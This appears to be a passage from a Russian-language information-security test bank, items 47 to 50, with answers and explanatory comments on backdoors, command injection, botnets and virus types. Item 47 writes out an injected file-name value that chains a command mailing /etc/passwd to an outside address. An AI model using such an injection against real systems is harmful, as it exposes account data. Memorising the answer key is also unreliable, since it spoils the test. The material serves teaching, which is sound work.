Как и в отношении любого другого процесса, условия безошибочной работы программы не могут быть определены, просто потому, что изначально невозможно выявить и учесть все параметры, влияющие на работу системы. Следовательно, невозможно и выявить все возможные ошибки. Для выявления и перехвата неизвестных ошибок с их последующей корректной обработкой, получения управления над системой и т.п. разработчики часто используют специально созданные программные ошибки - лазейки . Лазейка - скрытый программный или аппаратный механизм, позволяющий обойти системные механизмы защиты. Обычно этот механизм активизируется некоторым не очевидным способом. Лазейки не видны "конечным пользователям". Они создаются программистами для собственных нужд, большинство даже не догадывается об их существовании.

ЗАДАНИЕ N 47 ( - выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?

ВАРИАНТЫ ОТВЕТОВ:

1)

Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.

2)

Отправит файл aaa адресату goofinator@mail.ru.

3)

Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.

4)

Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

ОТВЕТ: 4

Комментарий:

  • mail - это базовое приложение для отправки и получения электронной почты. Для отправки почты, просто наберите "mail user@domain". Первая строка, это "Тема" (subject), далее идет содержимое письма. Закончить набор и отправить письмо можно, введя на новой строке символ "."(точка):

# mail mail@zabrosov.ru

Subject: Servers:We are working!

"All servers is work, well."

.

EOT

#

Другой вариант:

# echo "This is the mail body" | mail mail@zabrosov.ru

  • /etc/passwd — файл с перечнем пользовательских учётных записей в Unix.

  • Вывод данных на экран и чтение их с клавиатуры происходит потому, что по умолчанию стандартные потоки ассоциированы с терминалом пользователя. Это не является обязательным — потоки можно подключать к чему угодно — к файлам, программам и даже устройствам. В командном интерпретаторе bash такая операция называется перенаправлением.

< файл Использовать файл как источник данных для стандартного потока ввода.

> файл Направить стандартный поток вывода в файл. Если файл не существует, он будет создан; если существует — перезаписан сверху.

ЗАДАНИЕ N 48 ( - выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …

ВАРИАНТЫ ОТВЕТОВ:

1)

организация сетевых азартных игр

2)

распространение пиратского контента

3)

рассылка коммерческого спама

4)

хищение денег с кредитных карт

ОТВЕТ: 3

КОММЕНТАРИЙ (из файла И.В.):

Рассылка спама. Это наиболее распространенный и один из самых простых вариантов эксплуатации ботнетов. По экспертным оценкам, в настоящее время более 80% спамовых писем рассылается с зомби-машин. Спам с ботнетов не обязательно рассылается владельцами сети. За определенную плату спамеры могут взять ботнет в аренду.

По нашим данным, среднестатистический спамер зарабатывает 50-100 тысяч долларов в год. Многотысячные ботнеты позволяют спамерам осуществлять с зараженных машин миллионные рассылки в течение короткого времени.

ЗАДАНИЕ N 49 ( - выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем …

ВАРИАНТЫ ОТВЕТОВ:

1)

записи кода вируса в тело зараженной программы после каждого ее вызова

2)

перезаписи содержимого стека программы кодом вируса

3)

перезаписи служебных секторов дисков

4)

записи вируса на место кода программы

ОТВЕТ: 4

КОММЕНТАРИЙ (ответ из http://www.softplace.uz/security-menu/12-security-review/145-how-to-remove-virus-and-adware):

Перезаписывающие вирусы Вирусы данного типа записывают свое тело вместо кода программы, не изменяя названия исполняемого файла, вследствие чего исходная программа перестает запускаться. При запуске программы выполняется код вируса, а не сама программа.

ЗАДАНИЕ N 50 ( - выберите один вариант ответа) Обнаружить зашифрованный вирус можно ...

ВАРИАНТЫ ОТВЕТОВ:

1)

с помощью универсальной программы дешифрования

2)

по характерному поведению зараженной программы при запуске

3)

по сигнатурам кода процедур расшифровки вируса

4)

по изменению размера программы

ОТВЕТ: 3

КОММЕНТАРИЙ (ответ из ФАЙЛА И.В. http://computerf1.at.ua/publ/kompjuternye_virusy/chto_takoe_kompjuternye_virusy_i_kak_oni_rabotajut_4_chast/11-1-0-136):

Шифрованные вирусы Шифрованные вирусы (Encrypted viruses) - вирусы, которые сами шифруют свой код для затруднения их дезассемблирования и обнаружения в файле, памяти или секторе.